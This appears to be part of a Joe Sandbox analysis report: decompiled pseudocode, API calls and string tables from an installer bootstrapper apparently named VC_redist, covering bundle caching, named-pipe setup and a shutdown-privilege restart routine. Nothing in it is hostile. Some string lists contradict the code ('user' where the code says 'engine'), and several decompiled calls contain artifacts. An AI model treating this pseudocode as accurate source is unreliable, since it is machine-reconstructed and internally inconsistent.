                                                                          • Failed to copy cache id for pseudo bundle., xrefs: 0003C327
                                                                          • Failed to copy version for pseudo bundle., xrefs: 0003C4D0
                                                                          • Failed to copy download source for pseudo bundle., xrefs: 0003C231
                                                                          • Failed to copy repair arguments for related bundle package, xrefs: 0003C398
                                                                          • Failed to append relation type to repair arguments for related bundle package, xrefs: 0003C3B9
                                                                          • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0003C186
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                          • API String ID: 1357844191-2832335422
                                                                          • Opcode ID: acadbe4af3698903eb3cd431dc8c9eb90642f5a31d1ff260c0bcd6e3f8d332da
                                                                          • Instruction ID: da1616a652bbcac65093e95bfae9aff645c7dadebd5d0e9cc1904dbf2f7386a2
                                                                          • Opcode Fuzzy Hash: acadbe4af3698903eb3cd431dc8c9eb90642f5a31d1ff260c0bcd6e3f8d332da
                                                                          • Instruction Fuzzy Hash: 2DC1A071A40656BBEB66DE68C851EBA76EDBF08710F004129FD05FB242DB71EC509B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E000269CC(intOrPtr _a4, signed int _a8) {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				signed short _v16;
                                                                          				void* _v20;
                                                                          				signed short _v24;
                                                                          				char _v28;
                                                                          				signed short _v32;
                                                                          				signed short _v36;
                                                                          				signed short _v40;
                                                                          				char _v44;
                                                                          				signed short* _v48;
                                                                          				char* _v52;
                                                                          				void _v56;
                                                                          				void* __ebx;
                                                                          				intOrPtr* _t112;
                                                                          				intOrPtr* _t122;
                                                                          				void* _t134;
                                                                          				signed short _t148;
                                                                          				signed short _t151;
                                                                          				void* _t158;
                                                                          				signed int _t160;
                                                                          				intOrPtr* _t168;
                                                                          				void _t181;
                                                                          				signed short _t182;
                                                                          				signed short _t184;
                                                                          				signed short _t188;
                                                                          
                                                                          				_v36 =  *(_a4 + 0x428);
                                                                          				_t158 = 0;
                                                                          				_v44 = 0;
                                                                          				asm("stosd");
                                                                          				_push(0x2000012c);
                                                                          				_push(2);
                                                                          				_v20 = 0;
                                                                          				asm("stosd");
                                                                          				_v28 = 0;
                                                                          				_v8 = 0;
                                                                          				_v40 = 0;
                                                                          				_v32 = 0;
                                                                          				_v16 = 0;
                                                                          				_v24 = 0;
                                                                          				_v12 = 0;
                                                                          				asm("stosd");
                                                                          				E0001550F();
                                                                          				_t181 = _a4;
                                                                          				_t182 = E0001D39D(_t181 + 0xb8,  &_v44);
                                                                          				if(_t182 >= 0) {
                                                                          					E0003BC8F(__eflags, _t181 + 0xb8, _t181 + 0x2c0);
                                                                          					_t168 =  *((intOrPtr*)(_t181 + 0xc8));
                                                                          					__eflags =  *(_t181 + 0x460);
                                                                          					_t160 = 0 |  *(_t181 + 0x460) != 0x00000000;
                                                                          					__eflags =  *(_t181 + 0x470);
                                                                          					_t179 =  *_t168;
                                                                          					_t24 = _t160 + 1; // 0x1
                                                                          					_t110 =  ==  ? _t160 : _t24;
                                                                          					 *((intOrPtr*)( *_t168 + 0x70))(_t168,  ==  ? _t160 : _t24);
                                                                          					_t112 =  *((intOrPtr*)(_t181 + 0xc8));
                                                                          					_t169 =  *_t112;
                                                                          					_t184 = E0001D58B(_t181 + 0xb8, 1,  *((intOrPtr*)( *_t112 + 0x6c))(_t112));
                                                                          					__eflags = _t184;
                                                                          					if(_t184 >= 0) {
                                                                          						__eflags =  *((intOrPtr*)(_t181 + 0x30)) - 3;
                                                                          						if( *((intOrPtr*)(_t181 + 0x30)) != 3) {
                                                                          							_push( &_v20);
                                                                          							_push(0);
                                                                          							__eflags = E0003BADF();
                                                                          							if(__eflags >= 0) {
                                                                          								E0003BAD3(_t116);
                                                                          								_t163 = _t181 + 0x88;
                                                                          								 *(_t181 + 0xf0) = _a8;
                                                                          								_t182 = E0003BCC0(_t169, __eflags, _t181 + 0x88);
                                                                          								__eflags = _t182;
                                                                          								if(_t182 >= 0) {
                                                                          									_t170 = 0;
                                                                          									__eflags =  *(_t181 + 0x450);
                                                                          									if( *(_t181 + 0x450) != 0) {
                                                                          										L18:
                                                                          										_t120 = _t181 + 0x49c;
                                                                          										__eflags =  *_t120 - _t170;
                                                                          										if( *_t120 != _t170) {
                                                                          											L22:
                                                                          											__eflags =  *((intOrPtr*)(_t181 + 0x41c)) - _t170;
                                                                          											if( *((intOrPtr*)(_t181 + 0x41c)) == _t170) {
                                                                          												L28:
                                                                          												__eflags =  *((intOrPtr*)(_t181 + 0x420)) - _t170;
                                                                          												if(__eflags == 0) {
                                                                          													L32:
                                                                          													__eflags =  *(_t181 + 0x460) - _t170;
                                                                          													if( *(_t181 + 0x460) == _t170) {
                                                                          														_t158 = _v8;
                                                                          														L41:
                                                                          														__eflags =  *(_t181 + 0x470) - _t170;
                                                                          														if(__eflags != 0) {
                                                                          															_t182 = E0003B98B(__eflags, _t181, _t158,  &_v28,  &_v36,  &_v16,  &_v24,  &_v12);
                                                                          															_t120 = E0001D51C(_t181 + 0xb8, _t182);
                                                                          														}
                                                                          														__eflags = _t158;
                                                                          														if(_t158 == 0) {
                                                                          															L46:
                                                                          															__eflags = _t182;
                                                                          															if(_t182 >= 0) {
                                                                          																__eflags = _v16;
                                                                          																if(_v16 == 0) {
                                                                          																	__eflags = _v24;
                                                                          																	if(_v24 == 0) {
                                                                          																		__eflags = _v12 - 2;
                                                                          																		if(_v12 != 2) {
                                                                          																			__eflags =  *(_t181 + 0x480);
                                                                          																			if( *(_t181 + 0x480) != 0) {
                                                                          																				_t120 = E0003B962(_t181 + 0xb8, _t181 + 0x410,  *((intOrPtr*)(_t181 + 0x4b0)));
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          															goto L52;
                                                                          														} else {
                                                                          															_t120 = E000267B0(_t170, _t158);
                                                                          															__eflags = _t182;
                                                                          															if(_t182 < 0) {
                                                                          																L52:
                                                                          																__eflags = _v32;
                                                                          																if(_v32 == 0) {
                                                                          																	L62:
                                                                          																	__eflags = _v40;
                                                                          																	if(_v40 != 0) {
                                                                          																		_t120 = E0002CE6D(_t170, _t179,  *((intOrPtr*)(_t181 + 0x4b0)));
                                                                          																	}
                                                                          																	goto L64;
                                                                          																}
                                                                          																__eflags = _v36;
                                                                          																if(_v36 != 0) {
                                                                          																	L56:
                                                                          																	_t170 = 1;
                                                                          																	__eflags = 1;
                                                                          																	L57:
                                                                          																	__eflags = _t182;
                                                                          																	if(_t182 < 0) {
                                                                          																		L60:
                                                                          																		_t134 = 1;
                                                                          																		__eflags = 1;
                                                                          																		L61:
                                                                          																		_t120 = E0003BCFB(_t179, _t181, _t134, _t170, _v24, _v12);
                                                                          																		goto L62;
                                                                          																	}
                                                                          																	__eflags = _v16;
                                                                          																	if(_v16 != 0) {
                                                                          																		goto L60;
                                                                          																	}
                                                                          																	_t134 = 0;
                                                                          																	goto L61;
                                                                          																}
                                                                          																__eflags =  *(_t181 + 0x42c);
                                                                          																if( *(_t181 + 0x42c) != 0) {
                                                                          																	goto L56;
                                                                          																}
                                                                          																_t170 = 0;
                                                                          																goto L57;
                                                                          															}
                                                                          															_t182 = _t120;
                                                                          															goto L46;
                                                                          														}
                                                                          													}
                                                                          													_v56 = _t181;
                                                                          													_v52 =  &_v28;
                                                                          													_v48 =  &_v16;
                                                                          													_t158 = CreateThread(_t170, _t170, E000255BD,  &_v56, _t170, _t170);
                                                                          													__eflags = _t158;
                                                                          													if(_t158 != 0) {
                                                                          														_t170 = 0;
                                                                          														__eflags =  *(_t181 + 0x3f0);
                                                                          														if( *(_t181 + 0x3f0) != 0) {
                                                                          															goto L41;
                                                                          														}
                                                                          														_t182 = E000267B0(0, _t158);
                                                                          														__eflags = _t182;
                                                                          														if(_t182 >= 0) {
                                                                          															_t120 = CloseHandle(_t158);
                                                                          															_t170 = 0;
                                                                          															_t158 = 0;
                                                                          															goto L41;
                                                                          														}
                                                                          														_push("Failed while caching, aborting execution.");
                                                                          														L35:
                                                                          														_t120 = E0005012F();
                                                                          														_t170 = _t182;
                                                                          														goto L52;
                                                                          													}
                                                                          													_t148 = GetLastError();
                                                                          													__eflags = _t148;
                                                                          													_t188 =  <=  ? _t148 : _t148 & 0x0000ffff | 0x80070000;
                                                                          													__eflags = _t188;
                                                                          													_t182 =  >=  ? 0x80004005 : _t188;
                                                                          													E000137D3(0x80004005, "core.cpp", 0x280, _t182);
                                                                          													_push("Failed to create cache thread.");
                                                                          													goto L35;
                                                                          												}
                                                                          												_t182 = E0003BAE4(_t163, _t170, _t179, __eflags, _t181);
                                                                          												__eflags = _t182;
                                                                          												if(_t182 >= 0) {
                                                                          													_v32 = 1;
                                                                          													_t170 = 0;
                                                                          													__eflags = 0;
                                                                          													goto L32;
                                                                          												}
                                                                          												_push("Failed to register bundle.");
                                                                          												_t120 = E0005012F();
                                                                          												_t158 = _v8;
                                                                          												_t170 = _t182;
                                                                          												goto L62;
                                                                          											}
                                                                          											_t151 = E00027297(_t163, _t170, _t179, _t181,  *(_t181 + 0xf0));
                                                                          											__eflags = _t151;
                                                                          											if(_t151 >= 0) {
                                                                          												__eflags =  *(_t181 + 0x3ec);
                                                                          												_t182 = E0002CD9A(_t179,  *(_t181 + 0x3ec),  *((intOrPtr*)(_t181 + 0x4b0)), _t163,  *((intOrPtr*)(_t181 + 0x410)),  *((intOrPtr*)(_t181 + 0x494)), 0 |  *(_t181 + 0x3ec) == 0x00000000);
                                                                          												__eflags = _t182;
                                                                          												if(_t182 >= 0) {
                                                                          													_v40 = 1;
                                                                          													_t170 = 0;
                                                                          													__eflags = 0;
                                                                          													goto L28;
                                                                          												}
                                                                          												_push("Another per-machine setup is already executing.");
                                                                          												goto L4;
                                                                          											}
                                                                          											_push("Failed to elevate.");
                                                                          											goto L4;
                                                                          										}
                                                                          										_t182 = _t120;
                                                                          										__eflags = _t182;
                                                                          										if(_t182 >= 0) {
                                                                          											_t170 = 0;
                                                                          											__eflags = 0;
                                                                          											goto L22;
                                                                          										}
                                                                          										_push("Failed to cache engine to working directory.");
                                                                          										goto L4;
                                                                          									}
                                                                          									__eflags =  *(_t181 + 0x460);
                                                                          									if( *(_t181 + 0x460) != 0) {
                                                                          										goto L18;
                                                                          									}
                                                                          									__eflags =  *(_t181 + 0x470);
                                                                          									if( *(_t181 + 0x470) != 0) {
                                                                          										goto L18;
                                                                          									}
                                                                          									__eflags =  *(_t181 + 0x480);
                                                                          									if( *(_t181 + 0x480) != 0) {
                                                                          										goto L18;
                                                                          									}
                                                                          									_push(0xa000017c);
                                                                          									_push(2);
                                                                          									_t120 = E0001550F();
                                                                          									goto L5;
                                                                          								} else {
                                                                          									_push("Failed to set initial apply variables.");
                                                                          									goto L4;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Another per-user setup is already executing.");
                                                                          								goto L4;
                                                                          							}
                                                                          						} else {
                                                                          							_v12 = 1;
                                                                          							_t182 = 0x8007015e;
                                                                          							_t120 = E0001D742(_t169,  *((intOrPtr*)(_t181 + 0xc8)), 5, 0, 0x8007015e, 0, 0x10, 0);
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						E000137D3(_t114, "core.cpp", 0x23e, _t184);
                                                                          						_push("UX aborted apply begin.");
                                                                          						L4:
                                                                          						_push(_t182);
                                                                          						_t120 = E0005012F();
                                                                          						L5:
                                                                          						L6:
                                                                          						_t158 = _v8;
                                                                          						goto L64;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Engine cannot start apply because it is busy with another action.");
                                                                          					_push(_t182);
                                                                          					_t120 = E0005012F();
                                                                          					L64:
                                                                          					 *(_t181 + 0xf0) =  *(_t181 + 0xf0) & 0x00000000;
                                                                          					E0003BCEF(_t120);
                                                                          					if(_v20 != 0) {
                                                                          						ReleaseMutex(_v20);
                                                                          						CloseHandle(_v20);
                                                                          					}
                                                                          					if(_v44 != 0) {
                                                                          						E0001D443(_t181 + 0xb8);
                                                                          					}
                                                                          					if(_t158 != 0) {
                                                                          						CloseHandle(_t158);
                                                                          					}
                                                                          					_t122 =  *((intOrPtr*)(_t181 + 0xc8));
                                                                          					_push(_v12);
                                                                          					_push(_t182);
                                                                          					_push(_t122);
                                                                          					if( *((intOrPtr*)( *_t122 + 0xd8))() == 0x66) {
                                                                          						 *(_t181 + 0x18) = 1;
                                                                          					}
                                                                          					_push(E00023C30( *(_t181 + 0x18)));
                                                                          					_push(E00024224(_v12));
                                                                          					E0001550F(2, 0x2000018f, _t182);
                                                                          					return _t182;
                                                                          				}
                                                                          			}






























                                                                          APIs
                                                                            • Part of subcall function 0001D39D: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3AC
                                                                            • Part of subcall function 0001D39D: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0001D3BB
                                                                            • Part of subcall function 0001D39D: LeaveCriticalSection.KERNEL32(000000D0,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3D0
                                                                          • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00026D9A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00026DA3
                                                                          • CloseHandle.KERNEL32(00014740,?,00000000,?,00000000,00000001,00000000), ref: 00026DC0
                                                                          Strings
                                                                          • crypt32.dll, xrefs: 00026CD2
                                                                          • Failed to register bundle., xrefs: 00026C00
                                                                          • Failed while caching, aborting execution., xrefs: 00026CA8
                                                                          • Failed to elevate., xrefs: 00026BA5
                                                                          • Failed to set initial apply variables., xrefs: 00026B18
                                                                          • UX aborted apply begin., xrefs: 00026AA6
                                                                          • Another per-machine setup is already executing., xrefs: 00026BD9
                                                                          • Failed to cache user to working directory., xrefs: 00026B7F
                                                                          • user cannot start apply because it is busy with another action., xrefs: 00026A2F
                                                                          • core.cpp, xrefs: 00026A9C, 00026C76
                                                                          • Another per-user setup is already executing., xrefs: 00026AF1
                                                                          • Failed to create cache thread., xrefs: 00026C80
                                                                          • @Met, xrefs: 00026C52
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCriticalHandleSection$CompareEnterExchangeInterlockedLeaveMutexRelease
                                                                          • String ID: @Met$Another per-machine setup is already executing.$Another per-user setup is already executing.$user cannot start apply because it is busy with another action.$Failed to cache user to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                          • API String ID: 322611130-4076813137
                                                                          • Opcode ID: fbf3b5878cc433ad0711a796f19b611053d67a796a02bd0b0ecf237c1d81bbb9
                                                                          • Instruction ID: 3da337a988285e4d454a0849b57bf94225ac25999f8e51ad1bfdf0ecc9ce7d10
                                                                          • Opcode Fuzzy Hash: fbf3b5878cc433ad0711a796f19b611053d67a796a02bd0b0ecf237c1d81bbb9
                                                                          • Instruction Fuzzy Hash: 91C10471E01A2ABFDB199BA0DC45BEFB7B9FF04305F00422AF615A6141DB32AD44CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E00024CE8(intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
                                                                          				long _v8;
                                                                          				long _v12;
                                                                          				signed int _v16;
                                                                          				long _v20;
                                                                          				long _v24;
                                                                          				char _v28;
                                                                          				void* _t37;
                                                                          				signed short _t45;
                                                                          				signed short _t50;
                                                                          				void** _t54;
                                                                          				signed short _t56;
                                                                          				void* _t61;
                                                                          				intOrPtr* _t66;
                                                                          				void* _t67;
                                                                          
                                                                          				_v16 = _v16 | 0xffffffff;
                                                                          				asm("stosd");
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				if(_a8 != 0) {
                                                                          					L4:
                                                                          					_t66 = _a4;
                                                                          					_t67 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls",  *_t66);
                                                                          					if(_t67 >= 0) {
                                                                          						_t34 =  ==  ? 0 :  &_v28;
                                                                          						_t61 = CreateNamedPipeW(_v8, "eature: %2!ls!, state: %3!hs!\r\n", 0, 1, 0x10000, 0x10000, 1,  ==  ? 0 :  &_v28);
                                                                          						if(_t61 != 0xffffffff) {
                                                                          							if(_a8 == 0) {
                                                                          								_t37 = _v16;
                                                                          								goto L16;
                                                                          							} else {
                                                                          								_t67 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t66);
                                                                          								if(_t67 >= 0) {
                                                                          									_t37 = CreateNamedPipeW(_v8, "eature: %2!ls!, state: %3!hs!\r\n", 0, 1, 0x10000, 0x10000, 1, 0);
                                                                          									if(_t37 != 0xffffffff) {
                                                                          										L16:
                                                                          										 *(_t66 + 0x14) = _t37;
                                                                          										 *(_t66 + 0x10) = _t61;
                                                                          										 *_a12 =  *_a12 & 0x00000000;
                                                                          									} else {
                                                                          										_t45 = GetLastError();
                                                                          										_t70 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
                                                                          										_t67 =  >=  ? 0x80004005 :  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "pipe.cpp", 0x132, _t67);
                                                                          										_push(_v8);
                                                                          										_push("Failed to create pipe: %ls");
                                                                          										goto L14;
                                                                          									}
                                                                          								} else {
                                                                          									_push( *_t66);
                                                                          									_push("Failed to allocate full name of cache pipe: %ls");
                                                                          									L14:
                                                                          									_push(_t67);
                                                                          									E0005012F();
                                                                          									CloseHandle(_t61);
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t50 = GetLastError();
                                                                          							_t73 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                          							_t67 =  >=  ? 0x80004005 :  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "pipe.cpp", 0x126, _t67);
                                                                          							_push(_v8);
                                                                          							_push("Failed to create pipe: %ls");
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						_push( *_t66);
                                                                          						_push("Failed to allocate full name of pipe: %ls");
                                                                          						L6:
                                                                          						_push(_t67);
                                                                          						E0005012F();
                                                                          					}
                                                                          				} else {
                                                                          					_push(0);
                                                                          					_t54 =  &_v12;
                                                                          					_push(_t54);
                                                                          					_push(1);
                                                                          					_push(L"D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)");
                                                                          					L0003DE30();
                                                                          					if(_t54 != 0) {
                                                                          						_v28 = 0xc;
                                                                          						_v24 = _v12;
                                                                          						_v20 = 0;
                                                                          						goto L4;
                                                                          					} else {
                                                                          						_t56 = GetLastError();
                                                                          						_t76 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          						_t67 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "pipe.cpp", 0x116, _t67);
                                                                          						_push("Failed to create the security descriptor for the connection event and pipe.");
                                                                          						_push(_t67);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					LocalFree(_v12);
                                                                          				}
                                                                          				return _t67;
                                                                          			}


                                                                          APIs
                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00024D16
                                                                          • GetLastError.KERNEL32(?,00000000,?,?,0001442A,?), ref: 00024D1F
                                                                          • CreateNamedPipeW.KERNEL32(000000FF,eature: %2!ls!, state: %3!hs!,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0001442A,?), ref: 00024DC0
                                                                          • GetLastError.KERNEL32(?,0001442A,?), ref: 00024DCD
                                                                          • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0001442A,?), ref: 00024E93
                                                                          • LocalFree.KERNEL32(00000000,?,0001442A,?), ref: 00024EC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorErrorLastSecurity$CloseConvertCreateFreeHandleLocalNamedPipeString
                                                                          • String ID: @Met$D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$eature: %2!ls!, state: %3!hs!$pipe.cpp
                                                                          • API String ID: 3065245045-1794844320
                                                                          • Opcode ID: 654e116a0b19abcb7807d16e6bf6761474bb1a66a9b0fe811190d2a7283b0ebc
                                                                          • Instruction ID: 14080228f17cd7ca6a3f4048636bb623e6805d392eeb2037e781db4b31b08831
                                                                          • Opcode Fuzzy Hash: 654e116a0b19abcb7807d16e6bf6761474bb1a66a9b0fe811190d2a7283b0ebc
                                                                          • Instruction Fuzzy Hash: F051D271E40325BBEB219BA4EC46BEFBAA9EF04711F114125FE01FA1D0D3759E808A91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 43%
                                                                          			E000144E9(void* __edx) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                                          				void* _v28;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t13;
                                                                          				int _t24;
                                                                          				signed short _t31;
                                                                          				signed short _t34;
                                                                          				signed short _t37;
                                                                          				void* _t45;
                                                                          				int _t47;
                                                                          				int _t48;
                                                                          				signed int _t60;
                                                                          
                                                                          				_t45 = __edx;
                                                                          				_t13 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t13 ^ _t60;
                                                                          				asm("stosd");
                                                                          				_v28 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t47 = 0;
                                                                          				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v28) != 0) {
                                                                          					_v24.PrivilegeCount = 1;
                                                                          					_v12 = 2;
                                                                          					if(LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges)) != 0) {
                                                                          						if(AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0) != 0) {
                                                                          							do {
                                                                          								_t48 = 0;
                                                                          								Sleep(0x3e8);
                                                                          								_push(0x80040002);
                                                                          								_push(1);
                                                                          								_push(0);
                                                                          								_push(0);
                                                                          								_push(0);
                                                                          								_push(0);
                                                                          								if( *0x7aa5c() == 0) {
                                                                          									_t48 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
                                                                          								}
                                                                          								_t24 = _t47;
                                                                          								_t47 = _t47 + 1;
                                                                          							} while (_t24 < 0xa && (_t48 == 0x800704f7 || _t48 == 0x80070015));
                                                                          							if(_t48 < 0) {
                                                                          								E000137D3(_t24, "engine.cpp", 0x376, _t48);
                                                                          								_push("Failed to schedule restart.");
                                                                          								goto L13;
                                                                          							}
                                                                          						} else {
                                                                          							_t31 = GetLastError();
                                                                          							_t53 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          							_t48 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "engine.cpp", 0x362, _t48);
                                                                          							_push("Failed to adjust token to add shutdown privileges.");
                                                                          							goto L13;
                                                                          						}
                                                                          					} else {
                                                                          						_t34 = GetLastError();
                                                                          						_t56 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                          						_t48 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "engine.cpp", 0x35d, _t48);
                                                                          						_push("Failed to get shutdown privilege LUID.");
                                                                          						goto L13;
                                                                          					}
                                                                          				} else {
                                                                          					_t37 = GetLastError();
                                                                          					_t59 =  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
                                                                          					_t48 =  >=  ? 0x80004005 :  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "engine.cpp", 0x356, _t48);
                                                                          					_push("Failed to get process token.");
                                                                          					L13:
                                                                          					_push(_t48);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v28 != 0) {
                                                                          					CloseHandle(_v28);
                                                                          				}
                                                                          				return E0003DE36(0, _v8 ^ _t60, _t45, _t47, _t48);
                                                                          			}

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00014512
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00014519
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00014523
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00014573
                                                                          • GetLastError.KERNEL32 ref: 0001457D
                                                                          • CloseHandle.KERNEL32(?), ref: 00014677
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                                          • String ID: @Met$Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$user.cpp
                                                                          • API String ID: 4232854991-3888403951
                                                                          • Opcode ID: 7c856998b9ba8be401c9a6ebaf8bba7b2a8805079ba58b75f1e3606d41a71f56
                                                                          • Instruction ID: edf421233297cd60b85f3d5f9143a460807c8523d2b13d442ae485c5a8484d40
                                                                          • Opcode Fuzzy Hash: 7c856998b9ba8be401c9a6ebaf8bba7b2a8805079ba58b75f1e3606d41a71f56
                                                                          • Instruction Fuzzy Hash: 85410472A40324AFF7206AB99C49BFF76DCEB00756F010125FE05FB1E0D6289C8486E6
                                                                          Uniqueness

